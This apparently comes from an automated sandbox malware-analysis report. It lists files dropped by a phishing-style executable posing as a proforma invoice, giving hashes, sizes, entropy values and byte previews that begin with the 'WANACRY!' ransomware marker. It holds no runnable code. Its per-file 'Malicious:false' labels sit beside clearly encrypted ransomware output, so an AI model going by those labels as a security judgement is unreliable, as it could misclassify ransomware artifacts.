                                                          SSDEEP:48:bk3V2MT9We1rgAOeDMihedBvDG0emtu7ISorX0T4p32n1+w0UE48avdPdagj:o3V2Mhl1MA5XIdBv/twISsoW02ULFp
                                                          MD5:7705EDB3C9FA85AE81424A4F0E2A1C5A
                                                          SHA1:5871CF74FAB80F06299E511EB3EF0180ECC31855
                                                          SHA-256:B458D7AF483049F30F6732FBC1F69AB2E37D781E4EBF9283AB07F402AB7FD7C1
                                                          SHA-512:69A28B2293CFAB5487AC5D8DB8527EF4D58668ADE8AFB994D2F6EB584E1DF530D71D0FE1A35199B2F70779EADE4DAEB99686532AFE4E6B66DC80EE7311240A24
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....G..kjC.#....R`.P.-.6t...)8+.......U+y-5..(...x......X.'B..,..5.....o.i]."...|x.bH?k......d....@.d.MZ...1..2.,.-.-<@.|.....=l...........;.6.$....G...?S}.....zc...4'G^C...._.....\.."v...dt&.....7.k..5..y/&1....z.`........q.;9.T...D.,.{..Cy.g....7.......T.~...~y.....T.E..F.F..`.G..@...FjYVR.....|..Z..9Q.U1V..M....4.cH|....RC..X...q.........h.h=n...AmPL.kY.5 .>#3......).Nm.C.6.pt.'...8..d...7.;.L.S..."[.E..Jj.../.s..:{...t.K.*+N.~..."e$...(.W..R.[...IK5.<.6....QF..G..U3..+:..[.v....f........6.'...^.5.'..A./.s.q.kwt.nyZ.W..HbQWmKE.t..X..@.w...1/'()<..i.#...E..0.L:,.`....Pg.aQe...........Xi...'..Ml....-.(>..:.C./... 5...r......_.....I.5n.Gr..+...oM~N.u...h......$./'..t..1Q../.vm.u..[..)>K..,L.q1....7....,_.j1.....d.b.m.Y..S;.S...Z..Z...?..*M.........;..).{."=..3_#..V.u.....!..A&'..{.....IJ..3.W.+Ob...+....n.w.......l+&..,.Y..\...3....`...V.j.k.L+...V..2..h...X..{..J.o2..Wg... ................v.....@.........F.SU..=..E.#
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5656
                                                          Entropy (8bit):7.964050306691362
                                                          Encrypted:false
                                                          SSDEEP:96:oXm2Tv7lnQ6sjTZ+abrzEl9qM2C4kycWG8DFUzbxjGsuALa9CpmYGfuJIZXAfe0:2m2TjlQP7jYS5qWBRqpbu6UYGQIZQt
                                                          MD5:2BFEEA2775BEEA4BBC384772DB407ED8
                                                          SHA1:33D2569C4F1916E798FFCFFDF7DE0EFF38E0B450
                                                          SHA-256:0E73B2702C07C253CB7E186430818738AE8AD0DE44C3995CE67D1D637ED8B61F
                                                          SHA-512:B936EE2C02E88B4FE13E8513538A6D3F4E1E10FF98CF732CDC17F32AFB5B16670754C72209692E86BCBB53A8FB9FAB0B5EF41330E668C64DF86107D9D9D69DDB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....]....fk0;^..].Q..3g.S.q..JM..}.`~<.#u2.zs.c.Ql@2.q.<o}K...C..V...B.z.y...,..q..V........^.@.R..#.....u...>..E..*......PFqtP.T.}..........pG..7^.o..`...N..lh.?zE.?......=...._~*].H.LJ..s...D2.2.8.#.:...[..B.L.7.r..<^.._.JB..C.K...w.....Ar.&.*.F...b#.............6.L../..^.o/,....@....(".&X..fZ..B....$.....W%.K\....n...3..N...K.hl&y..-Z.5b..w...Qy.=..}....M.....L..u.(..G)..>..wA.^..H...~H..B....Ly+Q.D..s<...,q.....'7.f...z.%........./...........@5.0...3..TW.X.W.+U.....$E*g.....e....$...%..<.......i#.x...e.v."k...0.PF@..L......J<.0;............w.k!?......s.O........$........ .?..Sk..x7..3_....9g...U,.V~.k...k.=.v.8/.OL7.Z....S8i.Z~g.1z.`w~....l.;...2.q..E.A.\..OM..).W..\r.5..._..#....Z...X......]..2O!... .......<y...iPau......P...d.T.6..VAsj..j.P......2..c..U....}..\N..D.].6.Dbw.(.=;T.Z,g..[..q.W*......9....]..Q.a...G..(>...V..t.}.X.X0..\6...W;.>Q}]|cj.....XC.%..U3r-...Kbgy.L.....J$...|;.$......g.....?....q..).c...`.(Q...W.#...m.........c>.6h..b
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3208
                                                          Entropy (8bit):7.950377306879292
                                                          Encrypted:false
                                                          SSDEEP:48:bknRhlPyzsZslf0PPSPb9RjPYqzIIcR3BMiXeKwH0t7NXWY27:oRPygZs+SPbn8SIIcR3BwCRa
                                                          MD5:43778EFB4BB634DFC5917860A2DEAC30
                                                          SHA1:AD4C2AD0340A54BD637C058019D28C02A036C2B5
                                                          SHA-256:1AD1BE48A3021A914781EAE8B4DD3BDB71915973C33291BB6C8507321D377CFA
                                                          SHA-512:17800613EB766F16520E93843E8CF11968D7288B23E125EE607DEAB4A2C810EEAF73BE480132507E45C249063CB2ED0319449C40A336849A7B2D0C2307E027D9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....&*...8...P....O.p...\.\{...B;..J.....F.UQ..sY#E.^...j\Sn<.H..)H&...a!...t..n..wb.....S..5.^.4T.v.w........e..D...6..s..2......y.....dO.*L....r.z.r.Y..8.E..._^.....$yF....]].NU...7.U.I.?;N.n.=..!m.Nd...F....M.^9..K<.....|r..N...XK.&,.-.^..a....MD....g........m..V..Va./@P.e....l.|...(..DQv.......*W+.KK\GH.l.]~...uA...:{/.<U...U...f.5~....i.G.n...`......K.".........gR....1..+..........[....\.-m..@...>.Mt&&.5\w..oE'^i..oGX..s..e.B/4%...8..".Y....Ou..wD3.i(...Wo0.3`g!.........i.d.i......4.3F.]4.Z...x.k..D..2....'q...3..z7]..<....,.6........i...G.:;....gf...2em^9]..L.. .k....<.]...D.l..Em.C.P..tPV....0..y..j..p...m.l._......Q..};D....@.BxU.yJ..C....^.E....E..l..''(..Z^..0....I.,;j-j...z{p......N...=.]k......z`e.......%.QW<..=...`.B..o...#.9.j.. ..v.......Z%.I....%.fe:..*.7.g..vm...J..|..>.E_.....C....V....;.[P...P..p.w.l.wv@."..(<s...s..>.F;.d.G...{.....^....d1i...M....wc/._....%.$..o..4H....~r.dX. 2.....AG.#..OJUn".o6x1.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):12520
                                                          Entropy (8bit):7.986535132302385
                                                          Encrypted:false
                                                          SSDEEP:192:YMq228LTJaqvfjgFNQ5cPdX+1OhQ4mVZqFoi/uGE2E8DOfl+xBrgF5qhEpnyqnVd:K8hKbI1AEcDOYBrgr3yCPF
                                                          MD5:DA3379FB414CFD0C9BF3C3A0ACDBD026
                                                          SHA1:1EA7F007170A1D09FF61B42D7E9F186D257876D1
                                                          SHA-256:18285529AE75A5A59F84CF97EFC0DD7F60B255B40C412FCC5FFACD0E0B6AFB22
                                                          SHA-512:9DF960821C2A09BF4C346B9EDC6E1695A41C1CEC7842A8FB3497F06D1F2CF5A365FC1FC43ABB3CF59827C11CD139047B9DDD7D39362702A65E420BDA1887DA4A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....8.....wi.C.7...*....?..;.PZ..{.)Jj....5f....i.....fX9.OP.HX.=r...C.....'K?..b,p.i.S.w...'.(|....^...c.|..s..$......&.D..Z...4.r].K......|%.D..gu.w...g..Fs.....L..?..^.R.~....q.2lD........bVr.D..{.{N....l....6.pV=...@.....T..&.......k.H&....L`...../......dUg.t4....N..Et;G{i..........5rNT....(.P*Da.k..2......2......m..uU$b.{...f.!..6.;(..}......!.:(...S#;.h(.....H. A.U'.u.-.Q....[..e...ir.....i.T...S..}T.9q _0....37..`...jh.3.Q....1...<|.P...;^./.|.T.".$..6b.U.b.9...,V....SN#]..BG...8.^J.~."..r..2..?......3.bx....l.m....{....j.=..=7.(A...:p3f.)R..+6k..>~p.......t..M:|.v/..)P...)....=.x..R&fY..*5.g(...R......U.=B.;...l....k.t.c.$7...)...............x.]O......~~..@S.|v..r.w*.......WF.A4.Rb /...,......q.^........0.~..Nj......(=:.4.....8&\.P..g[.-ru{P..I2..Z..X6k..^....,.>.a.,.....%.ca.d!..P.l<....5.R._w.....].p.r...`....Rh......}.1a..!&..5..5...zt.~QA=.b&.......Y..M.....y...`...-...\.8W..g]c1(...N7..rL..8W.....o...x/W...5K.>."
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1848
                                                          Entropy (8bit):7.873835759356925
                                                          Encrypted:false
                                                          SSDEEP:48:bkBc1YQxYbr/wYNt49SOUNhPJU64QpGdFWr1voLn:oBI3xqWSZNxTBK
                                                          MD5:4C5F4F38CAACBF35AE8CA935CB51A0B5
                                                          SHA1:7B81F05FFDC815A764F28295EAF32DC450A51A25
                                                          SHA-256:A4DB16A701CCE05B1937980EC28853A1EB2751FD922F834025EDBC1CD9D46B70
                                                          SHA-512:3BC5DF24237B88FA123AE714A1C588BFEFD6274A68BAE88811B57EDB6F23311FB7B6E97895F515024BD4CFF78A294241A3399E0FA7F293824B0E14F7A2D3DC38
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!..........Mx..( 4V.3..ST.l.V&.d...=.{..^.h_....{..8..%.z.".ob....[..2.#...W..>....b",.i.Q*._..-......_A.-+..6|.hs.D..w.w.Xf.....k...W...?...#..d^...=[..(>...f. ..}E@....h.U..?..J....o.~...v..+.Y.rK.Sl<.B........y._.6.&p..H.w8.[.{..;.......$....f.._..................).f1..E-..i(..{...`.e..{.Z.....G.*..[.q......0..L.....#6.dy..v... ...%..e..e.x9.....`...9i..C.5.vl ..$..d..P.c%..;...v26.|2.oJU\.x+......e5r.w.$.9..1...(q.\....\.|.|b.CHc..y...s&.y..[..A..../...#Y.C91;..:P...g."D[9...m.....b..N.:....p..;.P....U.<...L.....p..l..V.]e..oMm..3+..g..yKYd.I.........5..%.8e0..wA..92...0.D.S."..YpG...........x.h..[..II..!.<."Q..Sw.#\.H{.....Mc;.,.PUq&.F...X.......'...-.....I...F..q..^\8.<..|-US.}.Q`V.P%+...:.......?......c.7.....g.uS.Q.T..*..1..z....%....Am}......;.......jql....|.`j;Q*..x..t..2.....Y..vo...cC.*...4.i|.....d..h.......pE..V....N.W].3.....r.`.x...8W....w..XF........PEc.tU.n!M,..n5....Xl.[...%..eI.Em1K3...zT..:..m+.;......j
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2664
                                                          Entropy (8bit):7.9262753688277146
                                                          Encrypted:false
                                                          SSDEEP:48:bkrRjy8fkTfnXAXVQkRSEGDY6zILxge2ABGIcHIJ9mXNmclgOk:orV2bXsQrEGDnzIilABGZi9mX4mgOk
                                                          MD5:20A18B42F47D7298BC3C48C60F6C3734
                                                          SHA1:59516D05647C22C768B65F6637C26387A33A5001
                                                          SHA-256:13552B40EE2E69FB97BB7DE3FBE305D26238E1F00A584424FDB395F9FBADB353
                                                          SHA-512:B178591E6F4466796287F49796FEEA3CDB9519601F0396E8EDD965DF486412DA10B618AB1A3982504FD2E3E473990FB4C3EE605C8F63E8E90520963E402D530A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....g.]k;\..R.&aT. }._n..C.s.....a..&...4i.=...U.....d....J.......@.N?"......./...={d".?.]d......;.R....a...).......x..O..kg.M'..Rk..K.f^+........Vdu.cQj......[...z.^-.XT......;.if..Z.@..7.0|..E..S..=.s...,.............!k..5d..2.`...,t!K\...U.T\....M.......0<..;..x.............[....N.Y>.7.3f...A..\k.....F.U.9.......T ..n...4.AX%{.L3..k....xG...L._T..C...../!R..p.P;;..Xd..N'.>.M.z....6qS.FJq.).Z0kO].Y..~.3.j.wC.^.wNGd../.=8d..b.5.......a..?....B.T..pi....n..h.4..... ..S.......B..........%4.o..[k..H....z.x...(..'.`....7..6_M.W...r.....c.tY..Q..^..W.\.x.........K..G..M,..rA.....~.xq'...+./.?.r...f.8..l..Q.B....Hu.$N.`.i...h+...........x.W.OrC..Y.(r...O........W.....,......}T+..N....2...".J3)..ui....A............4.Q8..S....N.c..{wN?.%...+x2eG..U'.P.."'Yq".<....z{...y,.G/.Q..Q..D.P'..'.........D..(K.~.... %.....N.7T.oY' .%...s..(.G\.{tX.#Z..C.^..@.nM...,..W..C/....F=.E....p..}........;a.....`z...I.3Q0..I.=..F....u1.m\...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3288
                                                          Entropy (8bit):7.948625850131873
                                                          Encrypted:false
                                                          SSDEEP:96:oZ63URncd90uyjELMofMDeUgbdXmIReP8dwFxnH1BDy1:93qncd98EHMD4ZmIRG8aRDD4
                                                          MD5:FEDEFA76EE02A5E3DB53C1E55C0069B0
                                                          SHA1:A2DD93BEFCCBC47D7B534BABCF6BE774ACFC157D
                                                          SHA-256:EB892C773F4E49288BF2BB95E5C249CB4C58B47328A67E225D73805ADBCB3220
                                                          SHA-512:837FB43EFB5E1B3440C25582937F5893ED5EE33A802A4A1F7DAE7EFC614EDA15D234B00970611540341F665741A370513C7D6D773FF163FCE1702DF486964145
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......|..d..Q.>C...\..x.%......s..$.4../.... ...egy...z].u#9.$..(..F...RG.RV..u..g.....e5.e.9...@~..........>dtH...F.;}.g..,..E.}f.....S.....L.7EJ.....$..h.f...J......d..K..],]{0...SX...1x.....g...G...F2...D.5.~.([.....^j.a.t..n.3..d.~.if..fTsp..B............PV..>`.0O.<.tZ.......&.<{..|...L.kMI.V._{.Z.j......hL....?....U0.\..'1=l:@.....P.[Y..8Yk........r.)Ok...J.2c$ur.....y..P`.b1...R.........<y...rZ..f..Esk......#F).SUi......<n>........9..B.-`B..n.....w....o...C...>.Q..G9.....X.o..t...j.......u.._......./4.@..R.N{.i...Y!..5...%M3f.F_.Flxi...YLdM..(y...K.JW.....X^5.y.~.\..x.M..y3f.wU.#K..1..\...Y.1g.'...m.d.......2.}.7kh.a..Si.j.."4...!=t..<...X..(.Vl..g..x.....A.....&._..D._.S.5.#..A....QHW..1Zj..s...4B#....Z.K...1u.X...iBc....f..?~.[..z=E......@a.JtWMC.L.>.M. .K.,..Q.-...N..K(...kft..(.2..Nu?..@...)`L.Nc..Bh.......F.V...R......>b..+[._zn..W+.}N.xF..F.1..f..C.M......G...<.X.|"...U........y.`L.....$\.MN[#..]....3e....j..R
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4136
                                                          Entropy (8bit):7.954667143097365
                                                          Encrypted:false
                                                          SSDEEP:96:o/NjNProriT/ufGdia647dvJha7qQk0wNkJ+9u:i5o8/ufGdfr7dBh+qCwGJ+9u
                                                          MD5:25C0123CB3637E2E2B803BF648FE71B4
                                                          SHA1:39665D7356A75B40A47E7D26297A4784EDCBD06D
                                                          SHA-256:666DEF5F273EC4D20614C293B3BEE6AC0BDF7EE4B6E5D5B70820622936F3019F
                                                          SHA-512:ACD5A840D57A3BDD208DCF75B83EA15899C66C3797E788E3990B4DA922B92F698A69CBECAC67DB9947589BD838D7CCEC463FB9275F2A264DD67670AFE7F5BC61
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....9.....N.7.*.wM...)q.3M..HkD..5.MxK....}.)........&...7(u.!.TX.>v..Kp>.:.....1...G.B.,?2.B...~u..V.=.}../....?.zx..g.5.|.m.Q_.n.....fge.C.0..].&R@.M6,d....^.....h7Q....W.......'.Ghx/..2.5.?fH..5.YP...v./...DQ1.^,c..F...#.../....3`....=..D....)..B............Y..Mg.Nyb..)...1!dk.4...........k..../J?.Fa..*....p......l....l......W0.Y.P-.x.a!3..6..Kb...a.......[....~T..V.m.... ...E9"\..\<!Y.X...7.\#..T9..}Z...g....h.*....LR....v.l...u.5"..f....|.............6..e2.K0.!>.u..h.J...:..I*..6{..B^............5m...Z..E@.....O..V...H.O...Gq.`.5G...xa....T|.l.P5...b.R.&...4q..5n.M..r...V$R..+..F.R.\../?~'".;..>AY..x...}8.?... ...*..S...5!J...g...k6...LH....\K`gl.@U.........e...J...C..Ir..[.f.x.&.3?........j.....Ii...C<..8.H.....\..._._.]...h..m..=7l.!.bO........t.p.~..vU.s.\..G..S......sv.H.l79ZK..[5..<...C.{J%...1...Y..K.3.k..ZG.|.....y...Y.i.._..Qh......[H.yW.w#..sB.ulK...Y......W.....+G.M)...Bd..2q"..........I.c?_&.G..C.t..:.&Ea.$d..sG%M......
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4136
                                                          Entropy (8bit):7.954667143097365
                                                          Encrypted:false
                                                          SSDEEP:96:o/NjNProriT/ufGdia647dvJha7qQk0wNkJ+9u:i5o8/ufGdfr7dBh+qCwGJ+9u
                                                          MD5:25C0123CB3637E2E2B803BF648FE71B4
                                                          SHA1:39665D7356A75B40A47E7D26297A4784EDCBD06D
                                                          SHA-256:666DEF5F273EC4D20614C293B3BEE6AC0BDF7EE4B6E5D5B70820622936F3019F
                                                          SHA-512:ACD5A840D57A3BDD208DCF75B83EA15899C66C3797E788E3990B4DA922B92F698A69CBECAC67DB9947589BD838D7CCEC463FB9275F2A264DD67670AFE7F5BC61
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2216
                                                          Entropy (8bit):7.901402492411875
                                                          Encrypted:false
                                                          SSDEEP:48:bkoxXJbL5l/cylqnpKV/s78l14Lex8NswutESfKm:ooxhdl/joEl1Nxc3zm
                                                          MD5:CB48C3D29612D9CBC368D82740A8235F
                                                          SHA1:7C108F97D8E2AA066957F078B8C00DA42306AB7E
                                                          SHA-256:1A8C55C302667FFFE7A724B3B55364B79BF2AA0D72DB6B22928425CC20F9AB9D
                                                          SHA-512:646920F8F0268A7F2F4CE46BB95EE483B4C3D32F666FB832535E8ED737F9053C76F6EDB0458FA99C2A20221A6E57815F301CCEDDA5907BEF0D91518D53D7B79E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1496
                                                          Entropy (8bit):7.861262427769727
                                                          Encrypted:false
                                                          SSDEEP:24:bkv8xFtrshRhoBr1XRamtSjXLaqcdLxL0QKyKpm+B7jVCTJ20zSshm14G8jLqA:bkGYhHChRtSjGFLx4Q5+BvkTnzpEatyA
                                                          MD5:8ECADC41F36F91E232FA2E2F3C2D1DAD
                                                          SHA1:26621E8BD125F716058748A702F69C20B6A40F90
                                                          SHA-256:D8598D12088FB0C4AC41D3F0D2BA253CFCE9679034CFAD7CF094028A7676478A
                                                          SHA-512:72C8AB89E99B784128B25B3FAD460CD1088B258F731A38EDFEAE0D79372D6589F2F31662B9192CBD1AC2D924139F554EB765C43F3E19A9D60CCC2DF3E875F5C5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4328
                                                          Entropy (8bit):7.949329636629746
                                                          Encrypted:false
                                                          SSDEEP:96:oo4MQ1tIYbQGJ7OL4e/oi4sO8gl9G2EZCAlyza7gS2L:jzAtIY0aC+sOdl9ulkat2L
                                                          MD5:4D6139B23AB649375A93DADCFFCA0786
                                                          SHA1:D1B90C0942C212C97F80CC357DDBEB0AF1D99A88
                                                          SHA-256:0D235FF7401C9B932991154C04A2240501035E9B20E5CB83729AC57425397CC7
                                                          SHA-512:95A7779474CC8E19E75A9FA16F410FE2DCFF29296DFD50E0D8BA2F1C85D6B8A39907D5693358624AC9DC813AACE009B7A02C9B2719A3908C1C62AE07F5EE7A59
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1176
                                                          Entropy (8bit):7.822363118738531
                                                          Encrypted:false
                                                          SSDEEP:24:bkADtwzs0lEfaltk7VmG1bjczO2b1jJbaRzsOiPvmy2Fk4Qx:bkZzookp1UzO2JNb5O8d2FOx
                                                          MD5:C8794C02C10788F138D27F98C18E5860
                                                          SHA1:E8A6735359F5B68CCD7A2E06D5236907346BCB43
                                                          SHA-256:FEDC25ADD45FFDBB7721C830FCAD8CAB0EBE94E528AEE80DF5BFACD0E41DF644
                                                          SHA-512:10ED46D41687AB31B6FEDC45F3ED96A1671B9EBFF7BAA7CF98FA8C15DA0CC36A869598AEAFEB5B2988619D7EEFEA0DA730C0CAE62669A65A1FAF68FF93460AC6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1432
                                                          Entropy (8bit):7.850367942896185
                                                          Encrypted:false
                                                          SSDEEP:24:bk+4NVo1M22oW47kVdG4i8j4SOtssEpBr7gDW6i11J5mgiZLw1Qj:bkRNVoOh4gVdG2jZQCph6CYNj
                                                          MD5:8FBCC4E1756180F15105D42B139B07C9
                                                          SHA1:55FC5E43A6460889CB87D82D3B1F137CBA54E67E
                                                          SHA-256:9E93148DE5FEC544B95097747C50CA01C9DFF105651B684AB77480FB44AD7921
                                                          SHA-512:AFF501C616744C7568F15BC6AB0E3D257688ED2D2E206A40E99E6E4CED92F3661B7E44D9FB233002E01322C01A8CAECE240F4E7B277DF771D597D81D692E0F65
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1592
                                                          Entropy (8bit):7.87589320722404
                                                          Encrypted:false
                                                          SSDEEP:48:bk+nVOakmv47Y9qspQJ7C55w33D+OeVqweCzKxo:owVxkmg7Y9gJuA3D+Oevmxo
                                                          MD5:44A5226737FA6C3F162A384030AE58A4
                                                          SHA1:ADED4FCBB15DB30FF94C211EE02A3E76AD15C0EE
                                                          SHA-256:63DC6E433F2AE87D9CE320380FC4EB9C028B556105BCAB4EFFC72E87634682A7
                                                          SHA-512:589BA7255F6FC5B848949C6A54610259D6BBEBD328B494A85AA4E0154CE8C00386CC1A5BFCED92A90C11046E3EBC0ACB447437A65D697C38FD7D3CEACDCBE32F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1800
                                                          Entropy (8bit):7.88846803252821
                                                          Encrypted:false
                                                          SSDEEP:48:bk4traZhLI9MXFrgSiFknXNvPibzME38DGK1/:o4traZhLzdgSmzyB1/
                                                          MD5:0FE707A204593CE7EFFC4D3D87EC95C3
                                                          SHA1:EC78FE15E69439AD63C82594DB5F7D3ACA389BEA
                                                          SHA-256:AEE040B9873716FC38EB8C3DA4385FB050A0D6468CBDD0E5C03EE3AA1A5E80B5
                                                          SHA-512:83FDD24CA4D49EF451352BD7CD82629FAE8EA146B31FE827E32BA78EB010B7D1F578DABB01F97824C5B40965DDF65C2F85B78F4689652FBE61C2BF1AD961E0D7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......D.*.~.m^.>..h.S..s.!.t!..E..[7.+.3.Lxt0....`~.D....i.&...S...8..0.+..C=7.a...?.....w....I>>..../..?.......w.#_#L.[.RTB.C..u.r../..R...u9.=...q............t..t$.._.-....j\.=.....(.l. ...>........./.=.z..R.B..A.A%...:.R.I.\c..h~.....-.D.R.u=.............^0..V...}.0M..B...i@..Q..^+.w...}..W....1.F6..$..B?.._.R...,.Q.DR.7$`\..zT.....d...'.....l-f......7..yaWI......+.._K&;..D...,.p....B..D.J>.O:a."........{.\...."5.^.K..f_>.).....S<]f.pT.>.M...2..I|e.e.$....V.l..&t..^6.q.r....n.3..rtl.\&_Ar.*_.$...D...0.......4....#.\...y3..-'./...M......l._.... f$H.et....0..(..".BY.T.........O.....Mo..x...J..O..p..ss.........!.........(.c..=.=.v=.....8.K...X.r......$...*...+....4.).<.S..(<.....6#.lk.J....I.U>\K.}..Y..i.fP.]..Iw......W;...B..4.?..1..;.KEZ...Z..G,:Fy!....V.(..1.<\......L....*.:..)Z.e3.........<.....6.I....6.X.....#j.....^.....-..k...PS....Y.Q. +.l..U*..80.gY.#.%.....ir..j.~.._*....]......V.L%Fj..21X/....n...6.r.zbx....T ..XIn.I......%.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2296
                                                          Entropy (8bit):7.925234697817188
                                                          Encrypted:false
                                                          SSDEEP:48:bkb0NLRb4nOtTbwt45TP7GrxV/Pe/397IQxyTDFBitfQwh0+DfwZe:oeSNEirTPYTWDyfQwh0+5
                                                          MD5:0C90D1F6A26BF720EF901ED1714D5D5B
                                                          SHA1:BEF4CED6C51779361762E413A9DBE88164EF0C2C
                                                          SHA-256:537BAF0AF29FBCA989631F35F6F6EC64CB5D99447F823C6F1B989E7F7393C21A
                                                          SHA-512:59E509608257C2A51753BA88FA4A57A5E691CB71B6A713C49D1AC1329C6465A0967ECE60739A60D3302BC6A547B2BA3079726FA0662E08D095B87E698D777783
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1528
                                                          Entropy (8bit):7.84391616669831
                                                          Encrypted:false
                                                          SSDEEP:24:bkN4pQeWMjGt5584Gs9MuhNFKMDtcmchiEoGVfzap8/gaUZfZ/lv7q0KrSSet9c9:bkNQQojG3K4GsqufFKwcPx1eK/gaUZP6
                                                          MD5:2CC24D0EC4D956D23CDAF554A10B4E0B
                                                          SHA1:DB8D76B2898EFC5C96BED125DFE794769553EF8E
                                                          SHA-256:B04C39F3969D17A08C1583D645CE753ADA881D4EAD04D665CF49C5D3692FB693
                                                          SHA-512:1CD90B3008A6DFCF7261BEFF4FBA93500AE0DF1776DDA0F6EB22C668CD1DDA196391E4DEFCB272ED785D40B204D25E6004D58DB60FFCF5882E71B3CC6E77E06A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4856
                                                          Entropy (8bit):7.961756314144701
                                                          Encrypted:false
                                                          SSDEEP:96:ogG6r1v8g0ciX7721sToYzoBJK+kpaxvTa7Sdq6d2nLBLgLT:DG6ho77CsTzz0JK+kpWPdsLBLm
                                                          MD5:7A76D42FFF6CD4A4B1A7C8E69D2D9C9A
                                                          SHA1:BB97516BFE5E6BDF61DCE30B855F0A24B5A942AB
                                                          SHA-256:79A4FF85A0E1C830A464665010391032B61D61A006996033D78A83C0F4397494
                                                          SHA-512:93A2D82693DF15A378AB6BF665376E4198A52BA21A1CB58B9B8CF7F4EB2B11C3897D14557A93BF0917F6FC0030AB4A0C842A468807F9D7FB0F349D52AF7F3C11
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1208
                                                          Entropy (8bit):7.828168510161053
                                                          Encrypted:false
                                                          SSDEEP:24:bkNOKxQawlRPMtDzfZUQJX8yCT6qw3UTFH20mgLxeT+DgqtzZ29lUbqiR0+G:bkwLlRElfaQBtCT9akHtmgwa8qtKlUbo
                                                          MD5:25626A267EB9B02ADAA7D27AB1A271B6
                                                          SHA1:47273543E8B5A3C1F48BC7E1EE07AE09DF06C03B
                                                          SHA-256:9AD374F2DC2E2A615F643215C84F68A7AC4194DAAC2CE89E8A7348E9C0E4B433
                                                          SHA-512:6A8EB819A20621EFE7763E254238E1B9CD0ECE1AB078B4337A5B14B0762ECAD184631D6E9FC206666B4A0D7D67DC24676AA82A5E410D80AC4E349351C2A8E3C8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1368
                                                          Entropy (8bit):7.8552504080538785
                                                          Encrypted:false
                                                          SSDEEP:24:bkf0EluvzyHTxOQ2K83o5IdaWJiZeu6MNbIFDCv/GTU3+w:bkf0lwTx7tJIQDeaMFmvgI+w
                                                          MD5:E0C3318D4A13DCAE845139F69766955D
                                                          SHA1:5616A6C4613F626851FC0188AFEA0262207EE3D3
                                                          SHA-256:7AFCB8E7EE9B4A1BB50BB2C217B60AEE9DF027E4869B58086BA79CA922AF6BC7
                                                          SHA-512:7D87BFA05B668C2142DB2FBDD7166B660BFCD88D492A983F26BCDD12F2E940D5DEE00681EE4760604F457503A0B930F2E1FA91D988BE9D0AA557C60E851ED314
                                                          Malicious:false
                                                          Reputation:unknown
